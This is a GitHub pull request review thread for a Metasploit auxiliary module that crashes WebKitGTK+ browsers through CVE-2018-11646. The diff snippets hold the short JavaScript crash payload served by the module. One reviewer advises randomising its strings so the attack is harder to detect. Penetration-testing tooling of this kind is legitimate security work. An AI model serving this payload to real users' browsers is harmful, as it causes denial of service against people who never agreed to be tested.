New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646 #10156
Conversation
def setup | ||
@html = <<-JS | ||
<script type="text/javascript"> | ||
win = window.open("sleep_one_second.php", "WIN"); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
What is sleep_one_second.php
?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
What i observed is that can be anything example hello_world.php
or WIN
@html = <<-JS | ||
<script type="text/javascript"> | ||
win = window.open("sleep_one_second.php", "WIN"); | ||
window.open("https://www.paypal.com", "WIN"); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can this be randomised? Does it need to be a real URL? If so, it should be configurable.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Alternatively, can the URL point back to the MSF HTTP server?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
URL is not necessary though, it can be configurable or simply we can change it to WIN
win = window.open("sleep_one_second.php", "WIN"); | ||
window.open("https://www.paypal.com", "WIN"); | ||
win.document.execCommand('Stop'); | ||
win.document.write("Spoofed URL"); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is this necessary? If so, is win.document.write('');
sufficient?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Not sure about this, but looks sufficient specifically to execute crash in WebkitGTK+
super( | ||
update_info( | ||
info, | ||
'Name' => "WebKitGTK+ leading to an application crash [DoS]", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Perhaps: WebKitGTK+ WebKitFaviconDatabase DoS
'Manuel Caballero' #JS Code | ||
], | ||
'References' => [ | ||
['EXPLOIT-DB', '44842'], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
EDB
['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'], | ||
['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html'] | ||
], | ||
'DisclosureDate' => 'June 03 2018', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
'Jun 3 2018`
Thanks bcloes 😎
Great stuff @RootUp |
Thanks @timwr |
@@ -0,0 +1,96 @@ | |||
## Vulnerable Application | |||
|
|||
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This module exploits a vulnerability in `WebKitFaviconDatabase` when `pageURL` is unset.
If successful, it could lead to application crash, resulting in denial of service.
The `webkitFaviconDatabaseSetIconForPageURL` and `webkitFaviconDatabaseSetIconURLForPageURL`
functions in `UIProcess/API/glib/WebKitFaviconDatabase.cpp` in WebKit, as used in WebKitGTK+
through 2.21.3, mishandle an unset `pageURL`, leading to an application crash.
|
||
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. | ||
|
||
Related links : |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Related links :
* https://bugs.webkit.org/show_bug.cgi?id=186164
* https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html
'Name' => "WebKitGTK+ WebKitFaviconDatabase DoS", | ||
'Description' => %q( | ||
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. | ||
If successful,it could leads to application crash, denial of service. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If successful, it could lead to application crash, resulting in denial of service.
win=window.open("sleep_one_second.php", "WIN"); | ||
window.open("https://www.paypal.com", "WIN"); | ||
win.document.execCommand('Stop'); | ||
win.document.write("Spoofed URL"); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hardcoded strings like Spoofed URL
and sleep_one_second.php
make the code easier to detect and prevent. They also increase the chances of the user realising something suspicious is afoot, in the event they're using a non-vulnerable browser that doesn't crash. These should be randomized where possible.
Similarly, PayPal probably aren't keen on being used as the default URL (free advertising?). The URL should point elsewhere if possible.
Suggestion's made by bcoles
Thanks @bcoles 😎 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Minor changes
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::HttpServer | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This also needs to
include Msf::Auxiliary::Dos
to avoid being unintentionally run by Pro and other tools.
WFM, thanks @RootUp ! |
Release NotesThis adds an DoS module for CVE-2018-11646, exploiting a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it can cause a crash in applications using a vulnerable version of WebKitGTK+ up to version 2.21.3. |
Summary
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
Tested on :
Epiphany Web Browser 3.28.x
Verification
Backtrace using Fedora 27
References:
https://bugs.webkit.org/show_bug.cgi?id=186164
https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html